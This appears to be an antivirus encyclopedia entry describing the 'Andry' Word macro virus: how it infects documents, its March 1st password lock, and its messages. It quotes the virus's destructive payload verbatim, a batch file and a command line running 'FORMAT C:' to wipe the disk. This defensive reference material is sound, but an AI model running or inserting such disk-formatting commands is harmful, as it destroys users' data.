Virus.MSWord.Andry

Class Virus
Platform MSWord
Description

Technical Details


This encrypted virus contains only one macro AutoOpen and infects the
global macro area on opening an infected document and writes itself to
other documents when they are being opened.


On March 1st it sets to documents the password “Andry Christian”, prints
the text to status bar:


* I’M ANDRY CHRISTIAN, IF YOU THOUGHT, YOUR DOCUMENTS
OR TEMPLATES WERE SAFE, YOU WERE WRONG ! *

It then displays the dialog:

HACKERS Labs ’96 – Hackware Technology Research
ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!!
DO YOU SUPPORT MY VIRUS ?
YES NO

In case of “NO” key the virus overwrites the C:AUTOEXEC.BAT file with
commands:

@ECHO OFF
CLS
ECHO Please wait . . .
FORMAT C: /U /C /S /AUTOTEST > NUL

and the C:CONFIG.SYS file with commands:

DOS=HIGH,UMB
FILES=40
BUFFERS=40
DEVICE=C:DOSHIMEM.SYS
DEVICE=C:DOSEMM386.EXE RAM

On the same date (March 1st) depending on the system time the virus runs
the disk formatting command:

COMMAND /C FORMAT C: /U /C /S /AUTOTEST > NUL

Depending on the system time the virus inserts into current document the
text:

Hello….
Andry Christian
WordMacro Virus
Is Here….!!!

The virus also contains the comments:

‘======================================================================’
‘ Source Code of Andry Christian WordMacro Virus 0.99 – �eta Release ‘
‘======================================================================’
‘ Virographer by Andry [Christian] in [Batavia] City, of INDONESIA ‘
‘ Viroright (C) 1996-1999 Hackware Technology Research – HACKERS Labs. ‘
‘ Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc ‘
‘ Last Update by 01-Maret-1996 & 01:03 PM – Found Bugs…? Call Me ‘
‘======================================================================’
‘ HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR’s TEAM ‘
‘======================================================================’